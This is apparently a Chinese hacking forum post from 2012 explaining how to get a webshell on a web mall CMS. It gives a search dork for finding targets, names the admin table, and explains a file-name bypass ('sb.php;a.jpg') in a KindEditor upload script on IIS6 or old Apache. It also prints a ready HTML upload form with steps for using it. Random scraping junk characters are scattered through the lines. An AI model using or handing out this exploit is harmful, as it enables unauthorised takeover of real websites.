关键字:inurl:webmall/detail.php?id% \9 j6 Y4 A$ |
9 S0 _6 ^7 d4 T. W
数据表:pwn_base_admin
$ }, W# ?. a0 w S* q
6 @, }5 X z% `$ h关于拿shell) A) `& s4 n; O% S1 N5 S
* I; ^) t/ _% Q7 F. W首先登录后台admin.php& x" U9 v2 s$ v& _3 D
5 T1 w; J A# p! X
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。; e. {5 J* k; V' _% Z
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg V9 w+ v6 B0 @* }+ H) J+ B0 R, d
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
% v7 W$ l, [5 g4 Z5 k<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
$ e) i# ~; x; [8 Z. j- e6 L7 |<input type="text" name="fileName" value="sb.php;a.jpg" /> / a9 |& T w& m5 p$ o4 t
<input type="hidden" name="attachPath" value="news/pics/" /> - X- w2 k+ I' k T
<input type="file" name="fileData" size="14" /></td>
$ k7 @, a' ], M4 ]' A<input type="submit" name="button" value="确定" />
: r5 j! F3 `; Z% Z" T</form>
3 l# F9 e# o9 R7 t. ?; ]1 N) B : o& i5 I1 \% I, C' v- f, `/ Q
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。) g: P! N/ C! z5 U0 N
! t8 v) I* A: q& @. J+ q4 Y
|
发表于 2012-11-9 20:52:15
收藏
分享
支持
反对